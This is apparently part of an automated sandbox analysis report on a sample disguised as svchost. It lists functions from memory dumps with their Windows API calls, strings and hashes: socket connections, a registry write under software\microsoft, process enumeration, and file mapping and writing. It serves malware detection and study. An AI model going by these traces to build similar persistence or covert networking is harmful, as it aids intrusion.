Part of subcall function 02D2C220: GetWindowInfo.USER32(?,?), ref: 02D2C254
Part of subcall function 02D2C220: SetWindowLongA.USER32(?,000000EC,?), ref: 02D2C276
Part of subcall function 02D2C220: SetLayeredWindowAttributes.USER32(?,0000FFFF,000000FF,00000002), ref: 02D2C289

GetClassLongA.USER32(?,000000E6), ref: 02D2C2D0
SetClassLongA.USER32(?,000000E6,00000000), ref: 02D2C2E3
SendMessageA.USER32(?,000000D2,00000000,00000000), ref: 02D2C2FA
SendMessageA.USER32(?,000000CC,00000000,00000000), ref: 02D2C30A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Long$ClassMessageSend$AttributesInfoLayeredProcessSleepThreadVisible
String ID:
API String ID: 923153955-0
Opcode ID: 4fb41a538cd7cbcbeda19568bd5cdae6293a36bff16af7cac0f01caf4ed9baef
Instruction ID: 7497eaf880609d7dbfc8156d089dae77f3a5494ea83f61346fe9694b990ffcc5
Opcode Fuzzy Hash: 4fb41a538cd7cbcbeda19568bd5cdae6293a36bff16af7cac0f01caf4ed9baef
Instruction Fuzzy Hash: 890144326902247BE3202B54FC0DFDE371C9F62BA5F400202F640BA3C0CBA4AD91C6B9

Function 02D393A0 Relevance: 10.5, APIs: 7, Instructions: 43networkthreadCOMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000001), ref: 02D393BB
shutdown.WS2_32(02D3949C,00000001), ref: 02D393C0
recv.WS2_32(02D3949C,?,00000400,00000000), ref: 02D393DF
recv.WS2_32(?,?,00000400,00000000), ref: 02D393F5
closesocket.WS2_32(?), ref: 02D39409
closesocket.WS2_32(02D3949C), ref: 02D3940C
ExitThread.KERNEL32 ref: 02D39410

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: closesocketrecvshutdown$ExitThread
String ID:
API String ID: 1638183600-0
Opcode ID: 6d479929b0b34a5996104260ff8127dbe7bfa52826a875b9f2da897d38b5058d
Instruction ID: c69c0eaa91245fbb077011d8f3747c895a6eb8588316d1b8302fbdf9528ac33a
Opcode Fuzzy Hash: 6d479929b0b34a5996104260ff8127dbe7bfa52826a875b9f2da897d38b5058d
Instruction Fuzzy Hash: 5FF081B29503187BD7209A64DC89F9A3B6CAB48B50F404444BB09BB2C0D6F4EC41CEF4

Function 02D23A70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000102,?,?,?,02D23BDC,?), ref: 02D23A90
RegSetValueExA.ADVAPI32(00000000,a1633ef1a,00000000,00000004,?,00000004,?,?,02D23BDC,?), ref: 02D23AAC
RegFlushKey.ADVAPI32(00000000,?,?,02D23BDC,?), ref: 02D23ABA
RegCloseKey.ADVAPI32(00000000,?,?,02D23BDC,?), ref: 02D23AC8

Strings

a1633ef1a, xrefs: 02D23AA6
software\microsoft, xrefs: 02D23A7F

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFlushOpenValue
String ID: a1633ef1a$software\microsoft
API String ID: 2510291871-2677533378
Opcode ID: cdfa7e64b656b542d6ff4f6ba16f065e27e138e01be88a16b77e4c43fefaf2f5
Instruction ID: a1bb66a6156f50090f399fc1f89ab3bc162fb84a481553522e88800ab8106cc0
Opcode Fuzzy Hash: cdfa7e64b656b542d6ff4f6ba16f065e27e138e01be88a16b77e4c43fefaf2f5
Instruction Fuzzy Hash: 1BF01DB5A44208FBE710CAA1ED0AFAE776CAB04B05F604854FA01A6340D674DE54D6B0

Function 00401600 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040160B
GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C

Strings

ntdll.dll, xrefs: 00401617
)@, xrefs: 00401644
RtlUniform, xrefs: 00401626

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll$)@
API String ID: 1545651562-3472953331
Opcode ID: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
Instruction ID: a861cb93b7f16bf3c872219f5ba967f96d5ad720afefe63f3816ea97d3f010e1
Opcode Fuzzy Hash: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
Instruction Fuzzy Hash: 89E01AB0600310DBEB009FB2AD09A563699AA94B113448836A709F21E2DA3CD810CA6D

Function 02D491D0 Relevance: 10.1, APIs: 8, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02D49236
HeapValidate.KERNEL32(00000000), ref: 02D4923D
GetProcessHeap.KERNEL32(00000000,?), ref: 02D4924A
HeapFree.KERNEL32(00000000), ref: 02D49251
GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02D49260
HeapValidate.KERNEL32(00000000), ref: 02D49263
GetProcessHeap.KERNEL32(00000000,?), ref: 02D49270
HeapFree.KERNEL32(00000000), ref: 02D49273

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate
String ID:
API String ID: 1670920773-0
Opcode ID: cd345bcac21f129ac36e829782efd032ea251bb9d6817a8cb1ca0d232a519287
Instruction ID: f28ef49680dc3c3c0b6d4b240521a3df84541210442775acf6a9c83ad6983083
Opcode Fuzzy Hash: cd345bcac21f129ac36e829782efd032ea251bb9d6817a8cb1ca0d232a519287
Instruction Fuzzy Hash: 7D31C771900304ABDF20DF6AD888BDB7BA9EF84324F448549ED499B345CB31DD50CBA0

Function 02D493D0 Relevance: 10.1, APIs: 8, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4a3516542e248dedfe7fb650a7c09612070ef7df0757f448cd5ce49c9cf9cb
Instruction ID: 1eb36ab8373324cbfb0d39d7d44927a682cfee57935c29491b1aaf9382101ca6
Opcode Fuzzy Hash: 2a4a3516542e248dedfe7fb650a7c09612070ef7df0757f448cd5ce49c9cf9cb
Instruction Fuzzy Hash: 6A01DE72A812046BDB206BA6FC8CF9B3B5CEB81754F604422F20886340CB35CC54CAF1

Function 02D4E22A Relevance: 9.1, APIs: 6, Instructions: 141fileCOMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 02D4E0CF
MoveFileA.KERNEL32(?,?), ref: 02D4E2BD
GetFileAttributesA.KERNEL32(?), ref: 02D4E301
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D4E373

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateDirectoryMovefree
String ID:
API String ID: 1026147201-0
Opcode ID: 461195cbd3074ee0c49a04be3cdb316551f566b7e5422e2f23119277b5ac2372
Instruction ID: b18ffa15a9dc32d019423ee1a36367f997f081b55c6e35ad2f91a639d18666b4
Opcode Fuzzy Hash: 461195cbd3074ee0c49a04be3cdb316551f566b7e5422e2f23119277b5ac2372
Instruction Fuzzy Hash: 1241363090435AAFCB218F789898BEA7FA5AF16304F5489A8E9C5C7341DF31DD49CB60

Function 02D48610 Relevance: 9.1, APIs: 6, Instructions: 108fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02D48654
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02D48F97), ref: 02D4866E
memcpy.MSVCRT ref: 02D48696
UnmapViewOfFile.KERNEL32(?,?,?,?,?,02D48F97), ref: 02D486A2

Part of subcall function 02D45580: GetHandleInformation.KERNEL32(?,00000000), ref: 02D45594
Part of subcall function 02D45580: CloseHandle.KERNEL32(?), ref: 02D455A5

memcpy.MSVCRT ref: 02D486CE
WriteFile.KERNEL32(?,?,00140B17,02D48F97,00000000,00140B17), ref: 02D48700

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
String ID:
API String ID: 3741995677-0
Opcode ID: b9050220fe1be3304c314a584f1dabd220ca1b68d8b02ccb91f4b371a3ebf6d8
Instruction ID: 63ed4bbe744b6ecc783bdf835c445ef4e0e18f30e7cd8910ed9f8e18ebb1b51d
Opcode Fuzzy Hash: b9050220fe1be3304c314a584f1dabd220ca1b68d8b02ccb91f4b371a3ebf6d8
Instruction Fuzzy Hash: AC317CB2A41209BBD710DF99EC85B6AF7B8FB58754F10825AE90497740DB70AD60CBE0

Function 02D390D0 Relevance: 9.1, APIs: 6, Instructions: 106networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 02D390FE
VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D3912F
VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D3915B
VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D39182
IsBadReadPtr.KERNEL32(?,00000004), ref: 02D391A4
WSASetLastError.WS2_32(?), ref: 02D391CE

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast$Read
String ID:
API String ID: 2835504744-0
Opcode ID: f6c9e7965ca2a2c75c5b40afbcd7e58e4779261153d1990399de020c16319d9d
Instruction ID: bbbed7a31981974d4ea21404ccbef477d919f4a6235cb4c192b3284d753d1643
Opcode Fuzzy Hash: f6c9e7965ca2a2c75c5b40afbcd7e58e4779261153d1990399de020c16319d9d
Instruction Fuzzy Hash: A341B5B5E41209AFDB40DFA9D895AEEBBF5EB48200F508529E905E7300E7749951CFA0

Function 02D50AF0 Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 02D50E50: htons.WS2_32(?), ref: 02D50E74
Part of subcall function 02D50E50: inet_addr.WS2_32(?), ref: 02D50E7F
Part of subcall function 02D50E50: htonl.WS2_32(000000FF), ref: 02D50E8A
Part of subcall function 02D50E50: gethostbyname.WS2_32(?), ref: 02D50E96
Part of subcall function 02D50E50: socket.WS2_32(00000002,00000001,00000000), ref: 02D50EB0
Part of subcall function 02D50E50: connect.WS2_32(00000000,?,00000010), ref: 02D50EC3
Part of subcall function 02D50E50: closesocket.WS2_32(00000000), ref: 02D50ECE

setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02D50B2F
closesocket.WS2_32 ref: 02D50B44

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: closesocket$connectgethostbynamehtonlhtonsinet_addrsetsockoptsocket
String ID:
API String ID: 2706992148-0
Opcode ID: 2ef2c1b06cc830ed670971286c024e55e2d7fddef8ba422b81b6d377605553ed
Instruction ID: fcbbe9500475ccfe6ed08e3275299f968514a1511e884f9a8da2c1d27f10d0a9
Opcode Fuzzy Hash: 2ef2c1b06cc830ed670971286c024e55e2d7fddef8ba422b81b6d377605553ed
Instruction Fuzzy Hash: 2231E671A01525BFDB108F68D888BE9B7A9FF08355F908256FA14D6280FBB19D50CBE1

Function 02D44EE0 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02D44EFB
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02D44F2C
TranslateMessage.USER32(?), ref: 02D44F48
DispatchMessageW.USER32(?), ref: 02D44F4E
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02D44F5C
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02D44F74

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
String ID:
API String ID: 1800058468-0
Opcode ID: 01360ba4b214ee4ceb44b3713fcc22c76a6296ec82eee32bdcb12a528a49f68d
Instruction ID: 6072eb25d4c8007a219cfd8f302513b69171d2d51a0bc179c5772573778d9ac9
Opcode Fuzzy Hash: 01360ba4b214ee4ceb44b3713fcc22c76a6296ec82eee32bdcb12a528a49f68d
Instruction Fuzzy Hash: C811AE71BD030567E73099989C8AFAE7719DB40B50F504511FB00DE2C0DBA1ECD1C6B5

Function 02D453E0 Relevance: 9.1, APIs: 6, Instructions: 67processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D45407
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D45415
Process32First.KERNEL32(00000000,?), ref: 02D4543D
Process32Next.KERNEL32(00000000,00000128), ref: 02D45460
GetHandleInformation.KERNEL32(00000000,00000000,?,00000000), ref: 02D45479
CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D4548A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
String ID:
API String ID: 3955875343-0
Opcode ID: bafa23e9194e93e6e0f8d37643cca4dcbfdc0215ab384b33cb683fa60e9d4356
Instruction ID: 9337e2c38f191b7128a02dfdceefd5346b75ac520bcc6a7446aec0e34e027709
Opcode Fuzzy Hash: bafa23e9194e93e6e0f8d37643cca4dcbfdc0215ab384b33cb683fa60e9d4356
Instruction Fuzzy Hash: 4711D372D01228ABD720DA64BC497EEB7A8EB49325FD40195E90CA3340E7345F54CAE0

Function 02D32A90 Relevance: 9.1, APIs: 6, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02D32A9E
GetWindowTextA.USER32(00000000,?,00000104), ref: 02D32AB9

Part of subcall function 02D32260: memset.MSVCRT ref: 02D32277
Part of subcall function 02D32260: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,74DEF550,00000000), ref: 02D3228E
Part of subcall function 02D32260: PathAddBackslashA.SHLWAPI(?,?,74DEF550,00000000), ref: 02D3229B
Part of subcall function 02D32260: PathFileExistsA.SHLWAPI(?,?,74DEF550,00000000), ref: 02D322D7
Part of subcall function 02D32260: lstrcpynA.KERNEL32(02D79F08,00000000,00000104,00000000,00000001,?,74DEF550,00000000), ref: 02D32301
Part of subcall function 02D32260: GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02D32310
Part of subcall function 02D32260: HeapValidate.KERNEL32(00000000,?,74DEF550,00000000), ref: 02D32313
Part of subcall function 02D32260: GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02D32320
Part of subcall function 02D32260: HeapFree.KERNEL32(00000000,?,74DEF550,00000000), ref: 02D32323

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32B17
HeapValidate.KERNEL32(00000000), ref: 02D32B1A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32B27
HeapFree.KERNEL32(00000000), ref: 02D32B2A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
String ID:
API String ID: 649337724-0
Opcode ID: 18f9b076a42b9c0dff4f25e7b17f3e0407bd66cb64af89d52bd19b817145a74f
Instruction ID: 2345f8a877e5645d0724b5a1b41f6977beed7ad3b898d4b1c5051a13108f7135
Opcode Fuzzy Hash: 18f9b076a42b9c0dff4f25e7b17f3e0407bd66cb64af89d52bd19b817145a74f
Instruction Fuzzy Hash: 5411B232E4821467DB215B34EC6CFE73BA9AB55314F440990ED8497380EBA4DC88C6B0

Function 02D2B880 Relevance: 9.0, APIs: 6, Instructions: 47synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02D2B88F
IsWindow.USER32(?), ref: 02D2B8B4
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2B8C2
ReleaseMutex.KERNEL32 ref: 02D2B8F7
IsWindow.USER32(?), ref: 02D2B8FE
SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02D2B90E

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
String ID:
API String ID: 1675675969-0
Opcode ID: 3416725fd011014eecf9b482e164a28be3fe2313a6815529a485dc82e2d2ee10
Instruction ID: c2aa9dba7167c1beb6aaa021b211738587b68faa9b6b515770573ed26b4bcfd6
Opcode Fuzzy Hash: 3416725fd011014eecf9b482e164a28be3fe2313a6815529a485dc82e2d2ee10
Instruction Fuzzy Hash: 5201C031A40220DFD7148B14F80CFE573A4AB99B2CF090AA6E905AB381C3F55D92CFA0

Function 02D2CA20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(02D2CB54,00000000), ref: 02D2CA2F
GetWindowLongA.USER32(02D2CB54,000000F0), ref: 02D2CA49
GetScrollBarInfo.USER32(02D2CB54,000000FA,?), ref: 02D2CA64
GetScrollBarInfo.USER32(02D2CB54,000000FB,0000003C), ref: 02D2CA91

Strings

<, xrefs: 02D2CA5D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: InfoScrollWindow$LongRect
String ID: <
API String ID: 4167475372-4251816714
Opcode ID: 54a6b0094ad218c9d2cf094949b952dad4b2df4ed1cbc7f8ce314e0026e27887
Instruction ID: bd2bebd03e82e6b17d85f98d1e2ee3777cfcd6c64a990874a21f3802951ba3fb
Opcode Fuzzy Hash: 54a6b0094ad218c9d2cf094949b952dad4b2df4ed1cbc7f8ce314e0026e27887
Instruction Fuzzy Hash: 2B311270904B01AFC324CF6AD584A5AFBF5BB58314B508A2EE49A93B54E730F884CF90

Function 02D48B40 Relevance: 8.8, APIs: 7, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02D48FF4,00000000,00140B17), ref: 02D48B55
HeapAlloc.KERNEL32(00000000,?,02D48FF4,00000000,00140B17), ref: 02D48B5C
memset.MSVCRT ref: 02D48B6F
GetProcessHeap.KERNEL32(00000000,00000000,02D48FF0,?,02D48FF4,00000000,00140B17), ref: 02D48C1E
HeapValidate.KERNEL32(00000000,?,02D48FF4,00000000,00140B17), ref: 02D48C21
GetProcessHeap.KERNEL32(00000000,00000000,?,02D48FF4,00000000,00140B17), ref: 02D48C2D
HeapFree.KERNEL32(00000000,?,02D48FF4,00000000,00140B17), ref: 02D48C30

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocFreeValidatememset
String ID:
API String ID: 470506929-0
Opcode ID: c6e583ea8e881373f6f6720d0a21ff2ac60342c526697596e44c80471fafb1bb
Instruction ID: 6cbe0e386b93e5c4ba5ac6e9d6bf83fa9c0e109dfffbfd9aaf748d7f3c1065ac
Opcode Fuzzy Hash: c6e583ea8e881373f6f6720d0a21ff2ac60342c526697596e44c80471fafb1bb
Instruction Fuzzy Hash: F221A6B1A017009FC720AF65D988A9BBFE9FF45754B40881DE59EDB300CB749945CFA2

Function 02D27660 Relevance: 8.8, APIs: 7, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D27220: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001), ref: 02D27246
Part of subcall function 02D27220: GetFileSizeEx.KERNEL32(00000000,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27264
Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000008,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D2728D
Part of subcall function 02D27220: RtlAllocateHeap.NTDLL(00000000,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27294
Part of subcall function 02D27220: memset.MSVCRT ref: 02D272A7
Part of subcall function 02D27220: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D272D3
Part of subcall function 02D27220: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D272E3
Part of subcall function 02D27220: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D272F2
Part of subcall function 02D27220: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D27305
Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27314
Part of subcall function 02D27220: HeapValidate.KERNEL32(00000000), ref: 02D2731B

GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,75B0A250,02D338FF), ref: 02D2769C
HeapAlloc.KERNEL32(00000000), ref: 02D276A3
memset.MSVCRT ref: 02D276B3
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,75B0A250,02D338FF), ref: 02D276D5
HeapValidate.KERNEL32(00000000), ref: 02D276D8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D276E5
HeapFree.KERNEL32(00000000), ref: 02D276E8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$Validatememset$AllocAllocateCreateFreeLockPointerReadSizeUnlock
String ID:
API String ID: 4191958461-0
Opcode ID: 8cfa51b72d6f6a54e14fd936998628e9fa09ef6de35356859d4aad6b62402e16
Instruction ID: efe45ee9b1f507178df66b124c9c79dc7ef177f475e7e8e45b8dc7e78b53f6f1
Opcode Fuzzy Hash: 8cfa51b72d6f6a54e14fd936998628e9fa09ef6de35356859d4aad6b62402e16
Instruction Fuzzy Hash: 3211A371A4122567E770AAA9AC48F5BB76DDF9575AF110118F904D7340CB60DD08C6F1

Function 02D37270 Relevance: 8.8, APIs: 7, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D44550: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76ECFFB0,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D4457D
Part of subcall function 02D44550: GetProcessTimes.KERNEL32(00000000,?,?,?,02D373C7,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D4459A
Part of subcall function 02D44550: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D445B2
Part of subcall function 02D44550: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02D373C7,00000000), ref: 02D445C3

EnterCriticalSection.KERNEL32(02D6FB80,00001B0C,00000000,00000000,008D48B8,02D37534), ref: 02D37288
LeaveCriticalSection.KERNEL32(02D6FB80), ref: 02D372A4
GetProcessHeap.KERNEL32(00000000,008D48B8), ref: 02D372C9
HeapValidate.KERNEL32(00000000), ref: 02D372CC
GetProcessHeap.KERNEL32(00000000,008D48B8), ref: 02D372D9
HeapFree.KERNEL32(00000000), ref: 02D372DC
LeaveCriticalSection.KERNEL32(02D6FB80), ref: 02D372E7

Memory Dump Source

